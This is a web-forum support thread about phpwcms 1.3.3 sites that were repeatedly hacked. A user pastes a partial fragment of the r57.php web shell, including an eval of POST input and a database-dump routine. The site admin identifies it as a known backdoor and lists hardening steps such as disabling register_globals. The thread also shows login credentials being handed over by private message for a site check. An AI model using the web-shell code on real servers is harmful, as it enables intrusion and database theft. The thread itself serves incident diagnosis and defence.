HELP! I WAS HACKED!

Get help with installation and running phpwcms here. Please do not post bug reports or feature requests here.
C3 Motorsport
Posts: 7
Joined: Thu 17. Mar 2005, 18:31
Location: San Jose, CA
Contact:

Post by C3 Motorsport »

Oliver Georgi wrote: Normally phpwcms is (should be) safe - and I have not heard of any other hacked 1.3.3.

Oliver
I posted this one not too long ago...

http://www.phpwcms.de/forum/viewtopic.php?t=15646

I've been hacked over and oever and over again. It's getting really old and I'm on the verge of moving to something else if I can't find out why.

I really love the program and would hate to have to transition to something else...but when I have about 40 sites on the same server and ONLY the phpWCMS ones are getting hit...something is wrong.

My hosting: Fatnetwork (reseller hosting, shared servers, globalvars is on - not sure how to turn them off if I don't own the server - and safemode is off)

Also, here is the code for the file that I found on my server allowing it to gain access to virtually everything...I can't read arabic, so I'm not sure just how far it really goes. Oliver, I hope you can make some REAL sense of this and hopefully identify some way we can protect ourselves from it.

The file was saved as r57.php and if you Google that, there are TONS of reports of people being hacked by it. Mambo, phpWCMS, and other users alike.

Code: Select all

","",$eval);
 @eval($eval);}
if ($_POST['cmd']=="mysql_dump")
 {
  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
  $sql = new my_sql();
  $sql->db   = $_POST['db'];
  $sql->host = $_POST['db_server'];
  $sql->port = $_POST['db_port'];
  $sql->user = $_POST['mysql_l'];
  $sql->pass = $_POST['mysql_p'];
  $sql->base = $_POST['mysql_db'];
  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
  else {
   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
   else { echo "[-] ERROR! Can't write in dump file"; }
   }
 }
echo "</textarea></div>";
echo "</b>";
echo "</td></tr></table>";
echo "<table width=100% cellpadding=0 cellspacing=0>";

...........

[Notice: Code partially removed by Oliver]

- Jason

C3 Motorsport: BMW Tuning & Accessories
http://www.c3motorsport.com
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

@C3 Motorsport
1) What release of phpwcms do you use?
2) Do you use any hack of phpwcms?
3) How do you remove it from system?

What's installed on your system is PHP.RSTBackdoor
http://securityresponse.symantec.com/se ... 22-4217-99

If you wish you can send me FTP login and I will have a look and check your system to see possible leaks and give you a detailed report.

The most important is register_globals Off.


Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
C3 Motorsport
Posts: 7
Joined: Thu 17. Mar 2005, 18:31
Location: San Jose, CA
Contact:

Post by C3 Motorsport »

Oliver Georgi wrote:@C3 Motorsport
1) What release of phpwcms do you use?
2) Do you use any hack of phpwcms?
3) How do you remove it from system?

What's installed on your system is PHP.RSTBackdoor
http://securityresponse.symantec.com/se ... 22-4217-99

If you wish you can send me FTP login and I will have a look and check your system to see possible leaks and give you a detailed report.

The most important is register_globals Off.


Oliver
Oliver,

Thank you very much for responding so quickly. I can understand why you removed some of the code. I just posted it so you would know specifically what I was dealing with.

The version I am using on all of my sites is 1.3.3

http://www.jason-steele.com
http://www.c3motorsport.com
http://www.5-75.org
http://www.blackwidowproject.com

As for setting the register_globals to off...I don't own the server, and I do not believe that FatNetwork will make the appropriate change solely for me, given the large number of people on the servers.

I will PM you with the pertinent login info and would greatly appreciate any guidance/direction yo ucan give me to seal up this hacking nightmare.
- Jason

C3 Motorsport: BMW Tuning & Accessories
http://www.c3motorsport.com
MattDwyer
Posts: 4
Joined: Sat 13. May 2006, 05:16

Post by MattDwyer »

One of my sites running 1.3.3 was hacked just recently, however it was ftp they broke into, not the website itself. They downloaded dozens of pages, altered, and re-uploaded them. It got my client blacklisted by Google for a few days.

Another client (also running 1.3.3) is seeing daily attempts to inject a url.
The url's point to php information gathering scripts, but I tried it myself and got nothing other than the expected webpage.

I'm pretty certain that kind of attack will never work, but if someone would like to confirm that with a quick reply, I'd be much relieved. I am still monitoring the site and checking various settings just to be safe.
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

I could check the hosting account of C3 Motorsport. It has multiple additional problems:
- safe_mode = Off
- register_globals = On
- open_basedir not set
- 3rd party scripts with known problems
- older releases of cPanel

So it is/was really hard to say exactly where injection comes from.

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
C3 Motorsport
Posts: 7
Joined: Thu 17. Mar 2005, 18:31
Location: San Jose, CA
Contact:

Post by C3 Motorsport »

Oliver Georgi wrote:I could check the hosting account of C3 Motorsport. It has multiple additional problems:
- safe_mode = Off
- register_globals = On
- open_basedir not set
- 3rd party scripts with known problems
- older releases of cPanel

So it is/was really hard to say exactly where injection comes from.

Oliver
Oliver has been a great help to me in identifying a lot of these issues, and I'm very grateful for his time. I've started implementing some of the corrective measures he's suggested on my other accounts and hopefully they will suppress most of the future attacks.

My next question is this, through the .htaccess and _.htaccess files, how do I set the safe_mod to "on" for the local account (much like we did for register_globals) and then set the "open_basedir"?

The cPanel I can do little about, and all 3rd party applications have been removed from my account with the exception of 1 commercial program which has no security issues that I'm aware of.
- Jason

C3 Motorsport: BMW Tuning & Accessories
http://www.c3motorsport.com
Pappnase

Post by Pappnase »

hello

if you google a litle you find that these settings can only changed by your host.

but it think thats not your biggest problem ... some of the settings are equal with my settings ...

maybe you should take a look at your logifiles and search for the phpfile wich was uploading to your space. there you should also see wich script they use for uploading.
Oliver Georgi
- 3rd party scripts with known problems
- older releases of cPanel
User avatar
Oliver Georgi
Site Admin
Posts: 9907
Joined: Fri 3. Oct 2003, 22:22
Contact:

Post by Oliver Georgi »

register_globals is at 1st the best you can do and which always have to be set off - it's the default PHP configuration since several years. In combination with safe_mode On it's better but not that important as register_globals set Off.

Oliver
Oliver Georgi | phpwcms Developer | GitHub | LinkedIn | Систрон
C3 Motorsport
Posts: 7
Joined: Thu 17. Mar 2005, 18:31
Location: San Jose, CA
Contact:

Post by C3 Motorsport »

Got it. Thanks for the tip!
- Jason

C3 Motorsport: BMW Tuning & Accessories
http://www.c3motorsport.com
Post Reply